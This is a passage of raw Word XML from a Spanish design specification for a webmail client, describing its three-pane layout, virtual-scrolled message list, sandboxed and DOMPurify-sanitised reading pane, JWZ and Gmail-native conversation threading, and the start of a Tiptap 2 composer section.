        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y texto blanco), e icono de estado de sincronización. Las carpetas del sistema —Inbox, Sent, Drafts, Trash, Spam— utilizan iconos de Heroicons (24×24px, stroke 1.5px) en color gris</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#5F6368</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Las carpetas personalizadas muestran un icono de carpeta con color configurable por el usuario seleccionado de una paleta de 18 colores predefinidos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sección de calendario en el sidebar muestra un mini-calendario mensual (180×180px) construido con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@fullcalendar/core</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en modo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dayGrid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sin header, con eventos representados como puntos de color bajo cada fecha. Un clic en cualquier fecha navega al módulo de calendario con esa fecha seleccionada.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="panel-central-lista-de-emails"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1.2 Panel Central: Lista de Emails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El panel central ocupa el espacio restante entre el sidebar (256px) y el reading pane (40% del ancho restante en desktop). Implementa virtual scrolling mediante el composable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useVirtualList</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de VueUse, que renderiza únicamente los items visibles y mejora drásticamente el rendimiento para listas con miles de elementos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[106]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La investigación demuestra que el virtual scrolling reduce el tiempo de renderizado a menos de 20ms por ítem y mantiene tasas de cuadro superiores a 60fps para listas con más de 1,000 elementos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[106]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[107]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada fila de email tiene una altura variable de 72px (mensaje no expandido) a 140px (con snippet de preview), con los siguientes elementos dispuestos en grid de 4 columnas: checkbox de selección (16×16px, borde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#DADCE0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), estrella de importancia (20×20px, toggle amarilla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#F4B400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/ gris vacía), remitente (fuente 14px, weight 500, truncado a 30 caracteres), y timestamp (12px, color</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#5F6368</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, formato relativo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hace 2h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para &lt;24h, fecha corta para mensajes antiguos).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La selección múltiple sigue el patrón de Gmail: click con Ctrl/Cmd añade a la selección, Shift+click selecciona el rango, y la barra de acciones flotante aparece en la parte inferior del panel central cuando hay múltiples items seleccionados. La barra de acciones contiene botones para: archivar (icono archivo), eliminar (icono basura), marcar como leído/no leído, y mover a carpeta (dropdown).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los badges de estado se renderizan como pills redondeadas (radio 12px) con los siguientes colores: no leído (fondo blanco, borde izquierdo azul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#1A73E8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de 3px), importante (estrella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#F4B400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y etiquetas personalizadas (colores configurables del usuario).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkStart w:id="102" w:name="panel-derecho-reading-pane"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1.3 Panel Derecho: Reading Pane</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El reading pane tiene un ancho de 40% del viewport en desktop (mínimo 400px, máximo 680px) y muestra el contenido del email seleccionado. Consta de dos secciones: el header del mensaje (remitente, destinatarios, asunto, fecha, acciones) y el cuerpo del mensaje.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El cuerpo del mensaje se renderiza dentro de un iframe aislado (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sandbox="allow-same-origin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) para mitigar riesgos de XSS. El HTML del email se sanitiza en el servidor con DOMPurify antes de almacenarse, configurando tags permitidos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">br</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">li</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">img</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blockquote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">td</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y atributos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">src</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El iframe tiene un CSP estricto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">default-src 'none'; style-src 'unsafe-inline'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un toggle en la parte superior del reading pane permite cambiar entre vista HTML renderizada y vista de texto plano (extraído del campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/plain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del MIME o generado mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">html-to-text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como fallback).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El modo texto plano renderiza el contenido en una fuente monoespaciada (Roboto Mono, 13px, color</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#202124</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, línea de 1.5) con citas anidadas indentadas por prefijo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Los enlaces en texto plano se detectan mediante expresión regular y se convierten a elementos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">clicables con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">target="_blank"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="107" w:name="vista-de-conversaciones-threading"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Vista de Conversaciones (Threading)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La vista de conversaciones es la innovación de UX más característica de Gmail — la idea de diseño fue que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">el valor de tener toda una conversación en un lugar superó con creces cualquier confusión menor por casos borde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[13]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Gmail apila los mensajes con avances (peeks) para cada mensaje, el más reciente arriba, con dos cosas siempre visibles: el mensaje no leído más nuevo y una referencia a otros mensajes en el hilo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[13]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Este patrón ha sido adoptado por Outlook, Thunderbird y ProtonMail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[12]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="104" w:name="algoritmo-jwz"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.1 Algoritmo JWZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para servidores IMAP genéricos, Webmail 6.0 implementa el algoritmo JWZ de Jamie Zawinski para agrupar mensajes en conversaciones. El algoritmo examina tres cabeceras MIME:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Message-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(identificador único del mensaje),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Reply-To</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(referencia al mensaje padre), y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lista de IDs de mensajes en el hilo). El proceso construye un grafo dirigido donde cada nodo es un mensaje y las aristas representan relaciones padre-hijo. Mensajes huérfanos (sin referencias coincidentes) se agrupan adicionalmente por coincidencia de asunto normalizado (eliminando prefijos tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Re:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fw:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fwd:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La implementación procesa los mensajes en tres pasadas: primera pasada indexa todos los</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Message-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, segunda pasada conecta aristas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Reply-To</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, tercera pasada agrupa huérfanos por asunto. La complejidad es O(n) donde n es el número de mensajes en la carpeta, ejecutándose en el cliente sobre los headers ya cacheados en MongoDB.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkStart w:id="105" w:name="gmail-threadid-nativo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.2 Gmail threadId Nativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para cuentas Gmail vía IMAP, Webmail 6.0 aprovecha la cabecera personalizada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-GM-THRID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que proporciona un identificador de hilo nativo de 64 bits. Esto elimina la necesidad del algoritmo JZW para Gmail, ya que el servidor ya ha realizado el agrupamiento. La capa de abstracción de protocolo detecta automáticamente si la cuenta es Gmail (mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-GM-EXT-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en la respuesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CAPABILITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y utiliza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">threadId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nativo cuando está disponible, cayendo a JWZ para servidores IMAP genéricos.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:id="106" w:name="vista-apilada"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.3 Vista Apilada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En el panel de lista, cada conversación se renderiza como una sola fila con el asunto como título, la lista de participantes truncada a los primeros 3 nombres + contador de mensajes restantes, y el snippet del mensaje más reciente. El badge de conteo de mensajes es un círculo de 20px con fondo gris</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#E8EAED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y texto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#5F6368</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al abrir una conversación, el reading pane muestra los mensajes apilados verticalmente: los mensajes antiguos aparecen colapsados mostrando solo remitente, primeras 120 caracteres del cuerpo, y timestamp. El mensaje más reciente siempre se renderiza expandido. Cada mensaje colapsado tiene una altura de 48px con un gradiente sutil de fondo que simula apilamiento físico. Un clic expande el mensaje, animado con transición CSS de 200ms ease-out. Un botón</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Expandir todos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en el header de la conversación expande simultáneamente todos los mensajes del hilo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:id="113" w:name="composer"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Composer</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="108" w:name="tiptap-2-editor-wysiwyg"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3.1 Tiptap 2 Editor WYSIWYG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El editor de composición se basa en Tiptap 2 (ProseMirror), integrado nativamente con Vue 3 vía el paquete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@tiptap/vue-3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con el composable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useEditor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y soporte para sintaxis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
